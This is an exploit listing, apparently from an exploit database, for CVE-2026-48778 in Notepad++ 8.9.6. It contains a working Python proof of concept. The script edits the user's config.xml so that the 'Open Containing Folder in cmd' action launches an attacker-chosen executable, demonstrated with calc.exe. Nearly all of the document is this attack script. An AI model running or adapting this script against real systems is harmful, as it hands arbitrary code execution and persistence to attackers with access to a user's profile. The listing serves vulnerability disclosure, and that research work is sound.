Share
## https://sploitus.com/exploit?id=PACKETSTORM:222345
# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution 
    # Date: 2026-05-30
    # Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/
    # Vendor Homepage: https://notepad-plus-plus.org
    # Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
    # Version: <= 8.9.6
    # Tested on: Windows 10/11
    # CVE: CVE-2026-48778
    # Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9
    #
    # Description:
    # Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without
    # validation and passes it to ShellExecute when "Open Containing Folder in cmd" is
    # triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an
    # arbitrary executable path, resulting in code execution under the current user context. 
    # In the following script, `calc.exe` has been used to demonstrate this vulnerability.
    
    
    import os, sys
    
    
    appdata = os.environ["APPDATA"]
    if not appdata:
        print("[!] APPDATA environment variable not found, exiting..")
        sys.exit()
    
    
    config_path = os.path.join(appdata, "Notepad++", "config.xml")
    existing = os.path.exists(config_path)
    if existing==True:
        print("[+] Found config.xml at ", config_path)
    else:
        print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
    
    x = open(config_path, 'r')
    s = x.readlines()
    
    payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
    injected=False
    
    for num,i in enumerate(s, start=0):
        if '<GUIConfig name="commandLineInterpreter">' in i:
            print("[!] Injecting payload..")         
            s[num]=payload
            injected=True
            break
        elif "</GUIConfigs>" in i:
            print("[!] Injecting payload..")
            s.insert(num, payload)       
            injected=True
            break
    if not injected:
        print("[!] Payload injection failed.")
        sys.exit(1)
    
    y = open(config_path, 'w')
    y.writelines(s)
    print("[+] Payload injected successfully!")
    print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
    print("[+] Calc.exe will launch instead of cmd.")
        
    
    print("end")